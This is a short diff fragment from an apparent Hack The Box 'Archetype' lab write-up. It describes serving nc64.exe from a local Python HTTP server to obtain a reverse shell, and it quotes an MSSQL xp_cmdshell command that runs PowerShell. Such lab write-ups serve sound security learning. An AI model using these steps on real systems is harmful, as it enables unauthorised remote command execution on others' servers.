FranciscoJavierPizarro/hackthebox_writeups/startingPoint/tier2/Archetype.md

 NULL
 ```

-We download the nc64.exe utility to upload it to the server to get the reverse shell we want

-to upload it we

-`sudo python3 -m http.server 80`
+We download the nc64.exe utility to upload it to the server to get the reverse shell we want, to upload it we start a HTTP server with `sudo python3 -m http.server 80`
 ```
 SQL> xp_cmdshell "powershell -c pwd" output